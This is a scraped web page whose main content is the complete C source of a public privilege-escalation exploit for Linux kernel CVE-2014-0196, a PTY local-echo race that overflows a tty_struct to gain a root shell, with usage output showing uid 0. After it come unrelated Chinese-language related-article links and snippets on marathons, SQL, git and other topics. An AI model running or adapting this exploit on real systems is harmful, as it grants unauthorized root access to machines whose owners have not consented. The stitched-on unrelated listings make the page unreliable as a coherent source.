/*
* CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race
* condition
*
* Slightly-less-than-POC privilege escalation exploit
* For kernels >= v3.14-rc1
*
* Matthew Daley <mattd@bugfuzz.com>
*
* Usage:
* $ gcc cve-2014-0196-md.c -lutil -lpthread
* $ ./a.out
* [+] Resolving symbols
* [+] Resolved commit_creds: 0xffffffff81056694
* [+] Resolved prepare_kernel_cred: 0xffffffff810568a7
* [+] Doing once-off allocations
* [+] Attempting to overflow into a tty_struct...............
* [+] Got it :)
* # id
* uid=0(root) gid=0(root) groups=0(root)
*
* WARNING: The overflow placement is still less-than-ideal; there is a 1/4
* chance that the overflow will go off the end of a slab. This does not
* necessarily lead to an immediate kernel crash, but you should be prepared
* for the worst (i.e. kernel oopsing in a bad state). In theory this would be
* avoidable by reading /proc/slabinfo on systems where it is still available
* to unprivileged users.
*
* Caveat: The vulnerability should be exploitable all the way from
* v2.6.31-rc3, however relevant changes to the TTY subsystem were made in
* commit acc0f67f307f52f7aec1cffdc40a786c15dd21d9 ("tty: Halve flip buffer
* GFP_ATOMIC memory consumption") that make exploitation simpler, which this
* exploit relies on.
*
* Thanks to Jon Oberheide for his help on exploitation technique.
*/ #include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <pthread.h>
#include <pty.h>
#include <stdio.h>
#include <string.h>
#include <termios.h>
#include <unistd.h> #define TTY_MAGIC 0x5401 #define ONEOFF_ALLOCS 200
#define RUN_ALLOCS 30 struct device;
struct tty_driver;
struct tty_operations; typedef struct {
int counter;
} atomic_t; struct kref {
atomic_t refcount;
}; struct tty_struct_header {
int magic;
struct kref kref;
struct device *dev;
struct tty_driver *driver;
const struct tty_operations *ops;
} overwrite; typedef int __attribute__((regparm(3))) (* commit_creds_fn)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* prepare_kernel_cred_fn)(unsigned long cred); int master_fd, slave_fd;
char buf[1024] = {0};
commit_creds_fn commit_creds;
prepare_kernel_cred_fn prepare_kernel_cred; int payload(void) {
commit_creds(prepare_kernel_cred(0)); return 0;
} unsigned long get_symbol(char *target_name) {
FILE *f;
unsigned long addr;
char dummy;
char name[256];
int ret = 0; f = fopen("/proc/kallsyms", "r");
if (f == NULL)
return 0; while (ret != EOF) {
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, name);
if (ret == 0) {
fscanf(f, "%s\n", name);
continue;
} if (!strcmp(name, target_name)) {
printf("[+] Resolved %s: %p\n", target_name, (void *)addr); fclose(f);
return addr;
}
} printf("[-] Couldn't resolve \"%s\"\n", name); fclose(f);
return 0;
} void *overwrite_thread_fn(void *p) {
write(slave_fd, buf, 511); write(slave_fd, buf, 1024 - 32 - (1 + 511 + 1));
write(slave_fd, &overwrite, sizeof(overwrite));
} int main() {
char scratch[1024] = {0};
void *tty_operations[64];
int i, temp_fd_1, temp_fd_2; for (i = 0; i < 64; ++i)
tty_operations[i] = payload; overwrite.magic = TTY_MAGIC;
overwrite.kref.refcount.counter = 0x1337;
overwrite.dev = (struct device *)scratch;
overwrite.driver = (struct tty_driver *)scratch;
overwrite.ops = (struct tty_operations *)tty_operations; puts("[+] Resolving symbols"); commit_creds = (commit_creds_fn)get_symbol("commit_creds");
prepare_kernel_cred = (prepare_kernel_cred_fn)get_symbol("prepare_kernel_cred");
if (!commit_creds || !prepare_kernel_cred)
return 1; puts("[+] Doing once-off allocations"); for (i = 0; i < ONEOFF_ALLOCS; ++i)
if (openpty(&temp_fd_1, &temp_fd_2, NULL, NULL, NULL) == -1) {
puts("[-] pty creation failed");
return 1;
} printf("[+] Attempting to overflow into a tty_struct...");
fflush(stdout); for (i = 0; ; ++i) {
struct termios t;
int fds[RUN_ALLOCS], fds2[RUN_ALLOCS], j;
pthread_t overwrite_thread; if (!(i & 0xfff)) {
putchar('.');
fflush(stdout);
} if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) == -1) {
puts("\n[-] pty creation failed");
return 1;
} for (j = 0; j < RUN_ALLOCS; ++j)
if (openpty(&fds[j], &fds2[j], NULL, NULL, NULL) == -1) {
puts("\n[-] pty creation failed");
return 1;
} close(fds[RUN_ALLOCS / 2]);
close(fds2[RUN_ALLOCS / 2]); write(slave_fd, buf, 1); tcgetattr(master_fd, &t);
t.c_oflag &= ~OPOST;
t.c_lflag |= ECHO;
tcsetattr(master_fd, TCSANOW, &t); if (pthread_create(&overwrite_thread, NULL, overwrite_thread_fn, NULL)) {
puts("\n[-] Overwrite thread creation failed");
return 1;
}
write(master_fd, "A", 1);
pthread_join(overwrite_thread, NULL); for (j = 0; j < RUN_ALLOCS; ++j) {
if (j == RUN_ALLOCS / 2)
continue; ioctl(fds[j], 0xdeadbeef);
ioctl(fds2[j], 0xdeadbeef); close(fds[j]);
close(fds2[j]);
} ioctl(master_fd, 0xdeadbeef);
ioctl(slave_fd, 0xdeadbeef); close(master_fd);
close(slave_fd); if (!setresuid(0, 0, 0)) {
setresgid(0, 0, 0); puts("\n[+] Got it :)");
execl("/bin/bash", "/bin/bash", NULL);
}
}
}

CVE-2014-0196(马拉松赛跑bug)的更多相关文章

  1. SegmentFault 2014黑客马拉松 北京 作品demo

    1号作品展示——最熟悉的陌生人 app 利用录音(声纹识别)和照片来让好久不见的见面变得不那么尴尬. 2号作品展示——神奇魔镜 app 灵感来自通话<白雪公主>,穿越到今天的“魔镜”功能依 ...

  2. 洛谷P3113 [USACO14DEC]马拉松赛跑Marathon_Gold 线段树维护区间最大值 模板

    如此之裸- Code: #include<cstdio> #include<cstring> #include<cmath> #include<algorit ...

  3. 【独家】K8S漏洞报告 | 近期bug fix解读

    安全漏洞CVE-2019-3874分析 Kubernetes近期重要bug fix分析 Kubernetes v1.13.5 bug fix数据分析 ——本周更新内容 安全漏洞CVE-2019-387 ...

  4. Bash漏洞批量检测工具与修复方案

    &amp;amp;lt;img src="http://image.3001.net/images/20140928/14118931103311.jpg!small" t ...

  5. Daily record-August

    August11. A guide dog can guide a blind person. 导盲犬能给盲人引路.2. A guide dog is a dog especially trained ...

  6. 你真的会玩SQL吗?表表达式,排名函数

    你真的会玩SQL吗?系列目录 你真的会玩SQL吗?之逻辑查询处理阶段 你真的会玩SQL吗?和平大使 内连接.外连接 你真的会玩SQL吗?三范式.数据完整性 你真的会玩SQL吗?查询指定节点及其所有父节 ...

  7. [译]git log进阶

    格式化log输出 oneline --oneline标记将每个commit压缩成一行. 默认情况下显示一个commit ID和commit描述的第一行. 输出如下: 0e25143 Merge bra ...

  8. RFID应用范围

    RFID应用范围 (1)物流: 物流过程中的货物追踪,信息自动采集,仓储应用,港口应用,邮政,快递 (2)零售: 商品的销售数据实时统计,补货,防盗 (3)制造业: 生产数据的实时监控,质量追踪,自动 ...

  9. Android安全研究经验谈

    安全研究做什么 从攻击角度举例,可以是:对某个模块进行漏洞挖掘的方法,对某个漏洞进行利用的技术,通过逆向工程破解程序.解密数据,对系统或应用进行感染.劫持等破坏安全性的攻击技术等. 而防御上则是:查杀 ...

随机推荐

  1. UITableView中的visibleCells的用法(visibleCells帮上大忙了)

      这两天遇到一个问题,UITableView中需要加入动画,而且每一行的速度不一样. 刚开始做时把所有的cell都遍历一遍加上动画,后来发现,如果数据很多时,就会出现各种各样的问题,而且没有显示在界 ...

  2. 查看sql server数据库各表占用空间大小

    exec sp_MSForEachTable @precommand=N' create table ##(id int identity,表名 sysname,字段数 int,记录数 int,保留空 ...

  3. JavaScript那些事儿(01): 对象

    一. 对象是什么 是单身童鞋们正在查找的“对象”吗?是的,他/她就是活生生的对象. Javascript是一种基于对象的语言, 你遇到的所有东西几乎都是对象. 但它又不同于基于类的语言.那么“类”又是 ...

  4. 【转】各种字符串Hash函数比较

    常用的字符串Hash函数还有ELFHash,APHash等等,都是十分简单有效的方法.这些函数使用位运算使得每一个字符都对最后的函数值产生影响.另外还有以MD5和SHA1为代表的杂凑函数,这些函数几乎 ...

  5. 关于ligerui和其他前端脚本的学习方法(适用于自己)

    特别是看别人的源代码(来源于自己看的那个cms系统),比如ligerui,别人用的juery和ligerui结合的很灵活,比如下面一段代码 var itemiframe = "#framec ...

  6. 19 Remove Nth Node From End of List(去掉链表中倒数第n个节点Easy)

    题目意思:去掉链表中倒数第n个节点 思路:1.两次遍历,没什么技术含量,第一次遍历计算长度,第二次遍历找到倒数第k个,代码不写了   2.一次遍历,两个指针,用指针间的距离去计算. ps:特别注意删掉 ...

  7. phpstorm 配置

    JetBrains PhpStorm 8注册码一枚 username :cf96PiPYt271u1TC License Key : 97807-12042010 00001GctOKh8f206hl ...

  8. python 安装PyV8 和 lxml

    近来在玩python爬虫,需要使用PyV8模块和lxml模块.但是执行pip install xx 或者easy_install xx 指令都会提示一些错误.这些错误有些是提示pip版本过低或者缺少v ...

  9. Solr In Action 笔记(4) 之 SolrCloud分布式索引基础

    Solr In Action 笔记(4) 之 SolrCloud Index 基础 SolrCloud Index流程研究了两天,还是没有完全搞懂,先简单记下基础的知识,过几天再写个深入点的.先补充上 ...

  10. strcmp() Anyone?

    uva11732:http://uva.onlinejudge.org/index.php?option=com_onlinejudge&Itemid=8&page=show_prob ...